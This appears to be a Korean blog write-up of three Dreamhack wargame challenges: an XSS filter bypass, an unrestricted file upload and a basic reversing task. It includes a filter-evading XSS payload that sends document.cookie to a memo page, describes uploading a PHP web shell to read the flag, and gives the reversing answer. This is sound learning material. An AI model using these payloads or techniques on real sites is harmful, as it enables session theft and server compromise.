Dreamhack | web hacking
01. XSS Filtering Bypass
문제의 사이트를 들어가면 역시나 다음과 같다.
#!/usr/bin/python3
from flask import Flask, request, render_template
from selenium import webdriver
import urllib
import os
app = Flask(__name__)
app.secret_key = os.urandom(32)
try:
FLAG = open("./flag.txt", "r").read()
except:
FLAG = "[**FLAG**]"
def read_url(url, cookie={"name": "name", "value": "value"}):
cookie.update({"domain": "127.0.0.1"}) # cookie의 domain값 update
try:
options = webdriver.ChromeOptions()
for _ in [
"headless",
"window-size=1920x1080",
"disable-gpu",
"no-sandbox",
"disable-dev-shm-usage",
]:
options.add_argument(_) # option변경
driver = webdriver.Chrome("/chromedriver", options=options)
driver.implicitly_wait(3)
driver.set_page_load_timeout(3)
driver.get("http://127.0.0.1:8000/")
driver.add_cookie(cookie)
driver.get(url)
except Exception as e:
driver.quit()
# return str(e)
return False
driver.quit()
return True
def check_xss(param, cookie={"name": "name", "value": "value"}):
url = f"http://127.0.0.1:8000/vuln?param={urllib.parse.quote(param)}"
return read_url(url, cookie)
def xss_filter(text):
_filter = ["script", "on", "javascript"] # script,on,javascript는 필터링됨
for f in _filter:
if f in text.lower():
text = text.replace(f, "")# ""으로 필터링
return text
@app.route("/")
def index():
return render_template("index.html")
@app.route("/vuln")
def vuln():
param = request.args.get("param", "")
param = xss_filter(param) #인자로 받은 param을 필터링
return param
@app.route("/flag", methods=["GET", "POST"])
def flag():
if request.method == "GET":
return render_template("flag.html")
elif request.method == "POST": # post요청시
param = request.form.get("param") # 작성부분은 param인자로 받음
# check_xss가 false인 경우
if not check_xss(param, {"name": "flag", "value": FLAG.strip()}): #check_xss의 과정에서
# wrong반환
return '<script>alert("wrong??");history.go(-1);</script>'
return '<script>alert("good");history.go(-1);</script>'
memo_text = ""
@app.route("/memo")
def memo():
global memo_text
text = request.args.get("memo", "")
memo_text += text + "\n" # 전역변수 memo_text에 text 추거
return render_template("memo.html", memo=memo_text)
app.run(host="0.0.0.0", port=8000)
/memo에 접속해보면 다음과 같은 주소를 넣었을 때 memo부분에 buri가 반환되는 것을 볼 수 있다.
http://host3.dreamhack.games:13258/memo?memo=buri
정보가 저장된 쿠키를 탈취하기 위해서는 /vuln 엔드포인트에서 발생하는 XSS취약점을 이용해야한다.
문제에서의 /memo를 통해서 공격하거나, 외부에서 접근 가능한 웹서버를 사용하여 공격할 수 있다.
공격에 사용되는 속성은 다음과 같다.
| location.href | 전체 URL을 반환하거나, URL을 업데이트할 수 있는 속성값 |
| documnet.cookie | 해당 페이지에서 사용하는 쿠키를 읽고, 쓰는 속성값 |
location에서의 'on' 또한 필터링에 걸리기에 나누어 주고 다음과 같이 입력해주면
<scronipt>document['locatio'+'n'].href = "/memo?memo=" + document.cookie;</scronipt>
02. image-storage
페이지를 열어보면 다음과 같다
/upload에서는 파일을 업로드 할 수 있으며, 다음과 같이 업로드 후에 경로가 노출된다. 확장자의 제한이 없어서 이미지 파일이 아니어도 업로드 된다.
/upload코드는 다음과 같다.
<?php
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
if (isset($_FILES)) {
$directory = './uploads/';
$file = $_FILES["file"];
$error = $file["error"];
$name = $file["name"];
$tmp_name = $file["tmp_name"];
if ( $error > 0 ) {
echo "Error: " . $error . "<br>";
}else {
if (file_exists($directory . $name)) {
echo $name . " already exists. ";
}else {
if(move_uploaded_file($tmp_name, $directory . $name)){
echo "Stored in: " . $directory . $name;
}
}
}
}else {
echo "Error !";
}
die();
}
?>
/list에서는 업로드한 파일들을 확인할 수 있고 파일 내용이 다 노출된다. image파일 뿐아니라 다른 파일도 업로드 가능하며 그대로 반환된다.
다음의 php파일을 업로드하면 ls명령어가 그대로 입력되어 /list에서 확인가능하다
우리는 flag가 /flag.txt에 존재한다는 걸 알고있기에 이 내용을 출력해줄 명령어를 php파일에 넣어서 업로드해주자
reversing | dreamhack
03. rev-basic-0
실행하면 다음과 같다.
64-bit ida에서 분석해보자
주석을 통해서 input을 print하고 그 값을 사용자 정의받으며, 아래에서 "Correct" 또는 "Wrong"을 반환하는 것을 볼 수 있다.
위의 코드에서 call하는 함수를 보면 다음과 같다.
int __cdecl main(int argc, const char **argv, const char **envp)
{
char v4[256]; // [rsp+20h] [rbp-118h] BYREF
memset(v4, 0, sizeof(v4));
sub_140001190("Input : ", argv, envp);
sub_1400011F0("%256s", v4);
if ( (unsigned int)sub_140001000(v4) )
puts("Correct");
else
puts("Wrong");
return 0;
}문자열 v4를 0으로 초기화 한 후에 값을 받아와서 조건을 만족하면 "Correct"를 반환하는 것을 볼 수 있다.
sub_140001000에서는 다음과 같이 인자로 받은 a1과 "Compar3_the_str1ing"고 비교하는 것으로 보아 이것이 flag임을 알 수 있다.
'wargame' 카테고리의 다른 글
| write-up 08 (0) | 2023.07.03 |
|---|---|
| write-up 06 (0) | 2023.05.18 |
| write-up 05 (0) | 2023.05.11 |
| write-up 04 (0) | 2023.05.04 |
| write-up 03 (0) | 2023.04.05 |